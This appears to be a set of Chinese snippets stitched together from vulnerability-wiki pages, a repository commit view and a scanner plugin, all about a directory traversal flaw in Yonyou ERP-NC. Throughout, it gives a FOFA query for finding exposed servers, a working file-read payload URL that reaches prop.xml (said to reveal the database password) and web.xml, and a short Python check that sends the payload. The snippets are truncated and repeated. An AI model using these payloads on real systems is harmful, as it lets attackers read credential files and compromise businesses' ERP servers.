漏洞复现 fofa语法:app="用友-UFIDA-NC" 用友ERP-NC页面如下: POC: /NCFindWeb?service=IPreAlertConfigService&filename= 在filename 后面加文件名即可读取文件,此处读取 WEB-INF/web.xml 文件: http://vul/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml 可以读取到数据库密码...
BIN +28.8 KB PeiQi_Wiki/OA产品漏洞/用友OA/image/yongyou-9.png Viewer requires iframe. 39 PeiQi_Wiki/OA产品漏洞/用友OA/用友ERP-NC 目录遍历漏洞.md @@ -0,0 +1,39 @@ # 用友ERP-NC 目录遍历漏洞 ## 漏洞描述 用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息 ## 漏洞...
用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息 fofa:app="用友-UFIDA-NC" POC & EXP http://127.0.0.1/NCFindWeb?service=IPreAlertConfigService&filename= # 在filename后面加文件名即可读取文件 http://127.0.0.1/NCFindWeb?service=IPreAlertConfigService&filename=ncwslogin.jsp...
name='用友ERP-NC 目录遍历漏洞' core.start_echo(name) path="/NCFindWeb?service=IPreAlertConfigService&filename=" r=core.get(url,path) ifr: if"jsp"inr.text: core.end_echo(name,'Payload:'+url+path) core.result(name,'Payload:'+url+path) ...
用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息 fofa:app=”用友-UFIDA-NC” POC & EXP http://127.0.0.1/NCFindWeb?service=IPreAlertConfigService&filename= 在filename后面加文件名即可读取文件 http://127.0.0.1/NCFindWeb?service=IPreAlertConfigService&filename=ncwslogin.jsp ...